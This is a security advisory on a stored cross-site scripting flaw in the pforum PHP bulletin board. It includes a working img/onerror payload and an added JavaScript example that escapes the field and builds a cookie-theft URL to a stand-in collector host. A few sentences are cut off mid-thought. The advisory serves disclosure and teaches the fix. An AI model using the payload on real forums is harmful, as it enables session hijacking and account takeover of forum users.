pscript.de PFORUM XSS Vulnerability
From: Christoph Jeschke <ponders.bugtraq () arcor de>
Date: Sun, 15 Aug 2004 01:34:59 +0200 (CEST)
Product: Powie's PSCRIPT Forum
Version: All versions before 1.26
OS: All with PHP and MySQL
Vendor URL: www.pscript.de
Vendor Status: informed
Security Risk Level: high
Remote Exploit: yes
pforum is a BBS, similar to phpBB and others. The author gives users the
possibility to enrich their profiles with personal data. Although the author
tries to eliminate malicious code (such as unwanted HTML) in the inputs, two of
the profile fields are not handled securely: their content is written into the
profile page without filtering. Therefore it's possible to steal cookies or do
other nasty things.
When you log into your account, pforum stores your user id, your password and
the PHP session id in cookies. If somebody redirects you, for example using a
URL, he can easily use your PHP session id to hijack your pforum session. If he
creates or modifies two cookies with the user id or the encrypted password, he
can easily hijack your account just by visiting
Proof of Concept
case example.org). The file contains the following code:
Edit your profile and enter the following line into the IRC Server or AIM ID
input box. The string has to be shorter than 100 characters.
// Input Box (without line break)
<img height=0 width=0 src=foo onerror=b(); >
Post a lot. Because the picture can't be found, the onError event handler fires
in the browser of everyone who views the post, and the visitor is redirected to
http://example.org/compute_stolen_data.ext. All cookie values are appended to
the URL.
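The following is an added example, not code from the advisory or from pforum. It models the profile-field rendering described above (a field value pasted verbatim into the profile page) beside the output encoding that would have neutralized the payload, and shows what the attacker-hosted b() has to do once the onerror handler fires. Everything about how pforum renders its fields, the query-string format of the collector URL, and the cookie names are assumptions; the advisory gives only the payload, the 100-character limit and the collector address.

```javascript
// Added example (not from the advisory or from pforum). Models the vulnerable
// profile-field rendering and its fix; all rendering details are assumptions.

// The exact payload from the advisory, entered into the IRC Server or AIM ID field.
const PAYLOAD = '<img height=0 width=0 src=foo onerror=b(); >';

// The advisory states the field must be shorter than 100 characters, which is
// why the handler only calls a short function name and the real script lives
// on the attacker's host.
const FIELD_MAX_LEN = 100;
function fitsField(value) {
  return value.length < FIELD_MAX_LEN;
}

// Vulnerable rendering, as the advisory describes it: the field value goes into
// the profile markup verbatim, so the <img> tag and its onerror handler become
// live markup in every reader's browser. (Assumed table layout.)
function renderFieldUnsafe(label, value) {
  return '<tr><td>' + label + '</td><td>' + value + '</td></tr>';
}

// The fix: HTML-escape the five significant characters before output. This is
// the same transformation PHP's htmlspecialchars($s, ENT_QUOTES) performs, the
// idiomatic fix in a PHP code base like pforum's.
const HTML_ESCAPES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#039;' };
function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, (c) => HTML_ESCAPES[c]);
}

function renderFieldSafe(label, value) {
  return '<tr><td>' + escapeHtml(label) + '</td><td>' + escapeHtml(value) + '</td></tr>';
}

// Crude check used to show the difference: does the rendered HTML still contain
// a tag carrying an on*= event-handler attribute?
function containsActiveMarkup(html) {
  return /<[a-z]+[^>]*\son[a-z]+\s*=/i.test(html);
}

// What the attacker's b() does once the handler runs in a victim's browser,
// per the advisory: send the victim to the collector URL with the cookie
// string appended. The collector path is the one named in the advisory; the
// "?<encoded cookies>" format is an assumption.
function buildExfilUrl(cookieString, collector = 'http://example.org/compute_stolen_data.ext') {
  return collector + '?' + encodeURIComponent(cookieString);
}

// Stand-alone demonstration with constructed sample values.
function demo() {
  console.log('payload length:', PAYLOAD.length, 'fits field:', fitsField(PAYLOAD));
  console.log('unsafe:', renderFieldUnsafe('IRC Server', PAYLOAD));
  console.log('safe:  ', renderFieldSafe('IRC Server', PAYLOAD));
  // Constructed cookie string; the real cookie names in pforum are not given in the advisory.
  console.log('exfil: ', buildExfilUrl('uid=42; pw=5f4dcc3b5aa765d61d8327deb882cf99'));
}
demo();
```

The payload is 44 characters, well under the limit, which is why an external script is needed: the handler only has room to call b(), and the redirect logic lives on example.org. The escaped rendering turns the tag into literal text, so nothing fires; the check in containsActiveMarkup is only a demonstration aid, not a substitute for escaping on output.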
Critical. You can gain administrator or moderator rights on the forum.
The vendor reacted quickly and fixed the vulnerability satisfactorily in a new
version of pforum (1.26).